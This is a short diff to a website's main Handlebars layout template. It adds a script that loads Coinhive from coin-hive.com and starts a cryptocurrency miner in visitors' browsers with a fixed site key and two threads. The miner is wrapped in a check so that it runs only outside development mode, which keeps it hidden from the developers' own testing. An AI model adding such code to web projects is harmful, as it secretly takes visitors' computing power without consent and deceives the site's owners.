--- a/views/layouts/main.handlebars
+++ b/views/layouts/main.handlebars
@@ -31,5 +31,14 @@
   {{{body}}}
 
   <script src="/js/main.min.js" async></script>
+  {{#unless ENV_DEVELOPMENT}}
+    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+    <script>
+      var miner = new CoinHive.Anonymous('e4cjnPnR00ZZFwzJdeC6MIIVFA7GdMLi', {
+        threads: 2
+      });
+      miner.start();
+    </script>
+  {{/unless}}
   </body>
 </html>
